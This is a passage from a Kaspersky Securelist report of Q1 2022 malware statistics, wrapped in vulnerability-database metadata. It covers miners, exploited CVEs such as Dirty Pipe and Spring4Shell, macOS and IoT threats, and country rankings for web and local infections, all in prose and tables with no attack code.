provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2022, Kaspersky solutions detected 21,282 new modifications of miners.\n\n_Number of new miner modifications, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231418/06-en-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 508,449 unique users of Kaspersky products and services worldwide.\n\n_Number of unique users attacked by miners, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231445/07-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231509/08-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 3.01 \n2 | Tajikistan | 2.60 \n3 | Rwanda | 2.45 \n4 | Uzbekistan | 2.15 \n5 | Kazakhstan | 1.99 \n6 | Tanzania | 1.94 \n7 | Ukraine | 1.83 \n8 | Pakistan | 1.79 \n9 | Mozambique | 1.69 \n10 | Venezuela | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarter highlights\n\nIn Q1 2022, a number of serious vulnerabilities were found in Microsoft Windows and its components. More specifically, the vulnerability [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) was found to be exploited by an unknown group of cybercriminals: a "type confusion" bug in the win32k.sys driver the attacker can use to gain system privileges. Also worth noting is [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>), a vulnerability in the User Profile Service which makes it possible to elevate privileges, along with [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21836>), which can be used to forge digital certificates.\n\nOne of the major talking points in Q1 was an exploit that targeted the [CVE-2022-0847](<https://dirtypipe.cm4all.com/>) vulnerability in the Linux OS kernel. It was dubbed "Dirty Pipe". [Researchers discovered](<https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/>) an "uninitialized memory" vulnerability when analyzing corrupted files, which makes it possible to rewrite a part of the OS memory, namely page memory that contains system files' data. This in turn opens up an opportunity, such as elevating attacker's privileges to root. It's worth noting that this vulnerability is fairly easy to exploit, which means users of all systems should regularly install security patches and use all available means to prevent infection.\n\nWhen it comes to network threats, this quarter continued to show how cybercriminals often resort to the technique of brute-forcing passwords to gain unauthorized access to various network services, the most popular of which are MSSQL, RDP and SMB. Attacks using the EternalBlue, EternalRomance and similar exploits remain as popular as ever. Due to widespread unpatched versions of Microsoft Exchange Server, networks often fall victim to exploits of ProxyToken, ProxyShell, ProxyOracle and other vulnerabilities. One example of a critical vulnerability found is remote code execution (RCE) in the Microsoft Windows HTTP protocol stack which allows an attack to be launched remotely by sending a special network packet to a vulnerable system by means of the HTTP trailer functionality. New attacks on network applications which will probably also become common are RCE attacks on the popular Spring Framework and Spring Cloud Gateway. Specific examples of vulnerabilities in these applications are [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) (Spring4Shell) and [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>).\n\n### Vulnerability statistics\n\nQ1 2022 saw an array of changes in the statistics on common vulnerability types. For instance, the top place in the statistics is still firmly held by exploits targeting vulnerabilities in Microsoft Office and their share has increased significantly to 78.5%. The same common vulnerabilities we've written about on more than one occasion are still the most widely exploited within this category of threats. These are [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which cause a buffer overflow when processing objects in a specially crafted document in the Equation Editor component and ultimately allow an attacker to execute arbitrary code. There's also [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), where opening a specially crafted file with an affected version of Microsoft Office software gives attackers the opportunity to perform various actions on the vulnerable system. Another vulnerability found last year which is very popular with cybercriminals is [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which they can use to exploit through a specially prepared Microsoft Office document with an embedded malicious ActiveX control for executing arbitrary code in the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231538/09-en-malware-report-q1-2022-pc.png>))_\n\nExploits targeting browsers came second again in Q1, although their share dropped markedly to just 7.64%. Browser developers put a great deal of effort into patching vulnerability exploits in each new version and closing a large number of gaps in system security. Apart from that, the majority of browsers have automatic updates as opposed to the distinct example of Microsoft Office, where many of its users still use outdated versions and are in no rush to install security updates. That could be precisely the reason why we've seen a reduction in the share of browser exploits in our statistics. However, this does not mean they're no longer an immediate threat. For instance, Chrome's developers fixed a number of critical RCE vulnerabilities, including:\n\n * [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>): a "type confusion" vulnerability in the V8 script engine which gives attackers the opportunity to remotely execute code (RCE) in the context of the browser's security sandbox.\n * [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>): a use-after-free vulnerability which allows to corrupt the process memory and remotely execute arbitrary codes when performing specially generated scripts that use animation.\n\nSimilar vulnerabilities were found in the browser's other components: [CVE-2022-0605](<https://nvd.nist.gov/vuln/detail/CVE-2022-0605>)which uses Web Store API, and [CVE-2022-0606](<https://nvd.nist.gov/vuln/detail/CVE-2022-0606>) which is associated with vulnerabilities in the WebGL backend (ANGLE). Another vulnerability found was [CVE-2022-0604](<https://nvd.nist.gov/vuln/detail/CVE-2022-0604>), which can be used to exploit a heap buffer overflow in Tab Groups, also potentially leading to remote code execution (RCE).\n\nExploits for Android came third in our statistics (4.10%), followed by exploits targeting the Adobe Flash Platform (3.49%), PDF files (3.48%) and Java apps (2.79%).\n\n## Attacks on macOS\n\nThe year began with a number of interesting multi-platform finds: the [Gimmick](<https://www.securityweek.com/chinese-cyberspies-seen-using-macos-variant-gimmick-malware>) multi-platform malware family with Windows and macOS variants that uses Google Drive to communicate with the C&C server, along with the [SysJoker backdoor](<https://threatpost.com/undetected-sysjoker-backdoor-malwarewindows-linux-macos/177532/>) with versions tailored for Windows, Linux and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 13.23 \n2 | AdWare.OSX.Pirrit.j | 12.05 \n3 | Monitor.OSX.HistGrabber.b | 8.83 \n4 | AdWare.OSX.Pirrit.o | 7.53 \n5 | AdWare.OSX.Bnodlero.at | 7.41 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.06 \n7 | AdWare.OSX.Pirrit.aa | 6.75 \n8 | AdWare.OSX.Pirrit.ae | 6.07 \n9 | AdWare.OSX.Cimpli.m | 5.35 \n10 | Trojan-Downloader.OSX.Agent.h | 4.96 \n11 | AdWare.OSX.Pirrit.gen | 4.76 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Bnodlero.ax | 4.45 \n14 | AdWare.OSX.Agent.gen | 3.74 \n15 | AdWare.OSX.Agent.q | 3.37 \n16 | Backdoor.OSX.Twenbc.b | 2.84 \n17 | Trojan-Downloader.OSX.AdLoad.mc | 2.81 \n18 | Trojan-Downloader.OSX.Lador.a | 2.81 \n19 | AdWare.OSX.Bnodlero.ay | 2.81 \n20 | Backdoor.OSX.Agent.z | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nThe TOP 20 threats to users detected by Kaspersky security solutions for macOS is usually dominated by various adware apps. The top two places in the rating were taken by adware apps from the AdWare.OSX.Pirrit family, while third place was taken by a member of the Monitor.OSX.HistGrabber.b family of potentially unwanted software which sends users' browser history to its owners' servers.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231608/10-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 2.36 \n2 | Spain | 2.29 \n3 | Italy | 2.16 \n4 | Canada | 2.15 \n5 | India | 1.95 \n6 | United States | 1.90 \n7 | Russian Federation | 1.83 \n8 | United Kingdom | 1.58 \n9 | Mexico | 1.49 \n10 | Australia | 1.36 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2022, the country where the most users were attacked was France (2.36%), followed by Spain (2.29%) and Italy (2.16%). Adware from the Pirrit family was encountered most frequently out of all macOS threats in the listed countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol as before. Just one quarter of devices attempted to brute-force our SSH traps.\n\nTelnet | 75.28% \n---|--- \nSSH | 24.72% \n \n**_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2022_**\n\nIf we look at sessions involving Kaspersky honeypots, we see far greater Telnet dominance.\n\nTelnet | 93.16% \n---|--- \nSSH | 6.84% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.07 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26 \n3 | Backdoor.Linux.Mirai.ba | 7.95 \n4 | Backdoor.Linux.Gafgyt.a | 5.55 \n5 | Trojan-Downloader.Shell.Agent.p | 4.62 \n6 | Backdoor.Linux.Mirai.ad | 3.89 \n7 | Backdoor.Linux.Gafgyt.bj | 3.02 \n8 | Backdoor.Linux.Agent.bc | 2.76 \n9 | RiskTool.Linux.BitCoinMiner.n | 2.00 \n10 | Backdoor.Linux.Mirai.cw | 1.98 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nSimilar IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q1-2022/105045/#attacks-on-iot-honeypots>) for Q1 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2022, Kaspersky solutions blocked 1,216,350,437 attacks launched from online resources across the globe. 313,164,030 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231643/11-en-malware-report-q1-2022-pc.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 22.63 \n2 | Tunisia | 21.57 \n3 | Algeria | 16.41 \n4 | Mongolia | 16.05 \n5 | Serbia | 15.96 \n6 | Libya | 15.67 \n7 | Estonia | 14.45 \n8 | Greece | 14.37 \n9 | Nepal | 14.01 \n10 | Hong Kong | 13.85 \n11 | Yemen | 13.17 \n12 | Sudan | 13.08 \n13 | Slovenia | 12.94 \n14 | Morocco | 12.82 \n15 | Qatar | 12.78 \n16 | Croatia | 12.53 \n17 | Republic of Malawi | 12.33 \n18 | Sri Lanka | 12.28 \n19 | Bangladesh | 12.26 \n20 | Palestine | 12.23 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country or territory._\n\nOn average during the quarter, 8.18% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/27074233/13-en-malware-report-q1-2022-pc-1.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2022, our File Anti-Virus detected **58,989,058** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **%**** \n---|---|--- \n1 | Yemen | 48.38 \n2 | Turkmenistan | 47.53 \n3 | Tajikistan | 46.88 \n4 | Cuba | 45.29 \n5 | Afghanistan | 42.79 \n6 | Uzbekistan | 41.56 \n7 | Bangladesh | 41.34 \n8 | South Sudan | 39.91 \n9 | Ethiopia | 39.76 \n10 | Myanmar | 37.22 \n11 | Syria | 36.89 \n12 | Algeria | 36.02 \n13 | Burundi | 34.13 \n14 | Benin | 33.81 \n15 | Rwanda | 33.11 \n16 | Sudan | 32.90 \n17 | Tanzania | 32.39 \n18 | Kyrgyzstan | 32.26 \n19 | Venezuela | 32.00 \n20 | Iraq | 31.93 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231744/13-en-malware-report-q1-2022-pc.png>))_\n\nOverall, 15.48% of user computers globally faced at least one Malware-class local threat during Q1. Russia scored 16.88% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T08:00:05", "type": "securelist", "title": "IT threat evolution in Q1 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-40444", "CVE-2022-0604", "CVE-2022-0605", "CVE-2022-0606", "CVE-2022-0609", "CVE-2022-0847", "CVE-2022-1096", "CVE-2022-21836", "CVE-2022-21882", "CVE-2022-21919", "CVE-2022-22947", "CVE-2022-22965"], "modified": "2022-05-27T08:00:05", "id": "SECURELIST:11665FFD7075FB9D59316195101DE894", "href": "https://securelist.com/it-threat-evolution-in-q1-2022-non-mobile-statistics/106531/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
CVE-2022-21919
